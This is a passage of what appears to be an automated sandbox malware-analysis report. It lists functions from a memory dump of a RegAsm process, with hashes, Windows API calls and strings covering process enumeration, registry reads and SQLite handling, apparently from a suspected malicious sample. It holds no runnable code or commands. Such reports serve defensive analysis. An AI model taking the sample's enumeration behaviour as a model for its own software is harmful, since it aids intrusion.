                            • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                            • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$wcslen
                            • String ID:
                            • API String ID: 239872665-3916222277
                            • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                            • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpywcslen$_snwprintfmemset
                            • String ID: %s (%s)$YV@
                            • API String ID: 3979103747-598926743
                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                            APIs
                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                            • wcslen.MSVCRT ref: 0040A6B1
                            • wcscpy.MSVCRT ref: 0040A6C1
                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                            • wcscpy.MSVCRT ref: 0040A6DB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                            • String ID: Unknown Error$netmsg.dll
                            • API String ID: 2767993716-572158859
                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                            APIs
                            Strings
                            • unable to open database: %s, xrefs: 0042F84E
                            • database is already attached, xrefs: 0042F721
                            • cannot ATTACH database within transaction, xrefs: 0042F663
                            • too many attached databases - max %d, xrefs: 0042F64D
                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                            • database %s is already in use, xrefs: 0042F6C5
                            • out of memory, xrefs: 0042F865
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                            • API String ID: 1297977491-2001300268
                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                            APIs
                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                            • Sleep.KERNEL32(00000001), ref: 004178E9
                            • GetLastError.KERNEL32 ref: 004178FB
                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$ErrorLastLockSleepUnlock
                            • String ID:
                            • API String ID: 3015003838-0
                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                            • memset.MSVCRT ref: 00413ADC
                            • memset.MSVCRT ref: 00413AEC
                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                            • memset.MSVCRT ref: 00413BD7
                            • wcscpy.MSVCRT ref: 00413BF8
                            • CloseHandle.KERNEL32(?), ref: 00413C4E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                            • String ID: 3A
                            • API String ID: 3300951397-293699754
                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • wcscpy.MSVCRT ref: 0040D1B5
                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                            • wcslen.MSVCRT ref: 0040D1D3
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • memcpy.MSVCRT ref: 0040D24C
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                            • String ID: strings
                            • API String ID: 3166385802-3030018805
                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                            APIs
                            • memset.MSVCRT ref: 00411AF6
                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                            • wcsrchr.MSVCRT ref: 00411B14
                            • wcscat.MSVCRT ref: 00411B2E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileModuleNamememsetwcscatwcsrchr
                            • String ID: AE$.cfg$General$EA
                            • API String ID: 776488737-1622828088
                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                            APIs
                            • memset.MSVCRT ref: 0040D8BD
                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                            • memset.MSVCRT ref: 0040D906
                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                            • _wcsicmp.MSVCRT ref: 0040D92F
                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                            • String ID: sysdatetimepick32
                            • API String ID: 1028950076-4169760276
                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                            APIs
                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$FreeLoadMessage
                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                            • API String ID: 3897320386-317687271
                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                            APIs
                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                            • API String ID: 4271163124-70141382
                            • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                            • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                            • API String ID: 4139908857-3953557276
                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: -journal$-wal
                            • API String ID: 438689982-2894717839
                            • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                            • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                            • String ID:
                            • API String ID: 4218492932-0
                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                            APIs
                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                            • memcpy.MSVCRT ref: 0044A8BF
                            • memcpy.MSVCRT ref: 0044A90C
                            • memcpy.MSVCRT ref: 0044A988
                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                            • memcpy.MSVCRT ref: 0044A9D8
                            • memcpy.MSVCRT ref: 0044AA19
                            • memcpy.MSVCRT ref: 0044AA4A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: gj
                            • API String ID: 438689982-4203073231
                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                            • memset.MSVCRT ref: 00405ABB
                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                            • SetFocus.USER32(?), ref: 00405B76
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSend$FocusItemmemset
                            • String ID:
                            • API String ID: 4281309102-0
                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintfwcscat
                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                            • API String ID: 384018552-4153097237
                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ItemMenu$CountInfomemsetwcschr
                            • String ID: 0$6
                            • API String ID: 2029023288-3849865405
                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                            APIs
                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                            • memset.MSVCRT ref: 00405455
                            • memset.MSVCRT ref: 0040546C
                            • memset.MSVCRT ref: 00405483
                            • memcpy.MSVCRT ref: 00405498
                            • memcpy.MSVCRT ref: 004054AD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$memcpy$ErrorLast
                            • String ID: 6$\
                            • API String ID: 404372293-1284684873
                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                            APIs
                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                            • GetLastError.KERNEL32 ref: 0041855C
                            • Sleep.KERNEL32(00000064), ref: 00418571
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                            • GetLastError.KERNEL32 ref: 0041858E
                            • Sleep.KERNEL32(00000064), ref: 004185A3
                            • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AttributesErrorFileLastSleep$??3@
                            • String ID:
                            • API String ID: 1040972850-0
                            • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                            • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                            APIs
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                            • wcscpy.MSVCRT ref: 0040A0D9
                            • wcscat.MSVCRT ref: 0040A0E6
                            • wcscat.MSVCRT ref: 0040A0F5
                            • wcscpy.MSVCRT ref: 0040A107
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                            • String ID:
                            • API String ID: 1331804452-0
                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                            APIs
                            Strings
                            • <?xml version="1.0" ?>, xrefs: 0041007C
                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                            • <%s>, xrefs: 004100A6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf
                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                            • API String ID: 3473751417-2880344631
                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscat$_snwprintfmemset
                            • String ID: %2.2X
                            • API String ID: 2521778956-791839006
                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintfwcscpy
                            • String ID: dialog_%d$general$menu_%d$strings
                            • API String ID: 999028693-502967061
                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                            APIs
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                              • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                              • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                            • memset.MSVCRT ref: 0040C439
                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • _wcsupr.MSVCRT ref: 0040C481
                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                            • memset.MSVCRT ref: 0040C4D0
                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                            Memory Dump Source
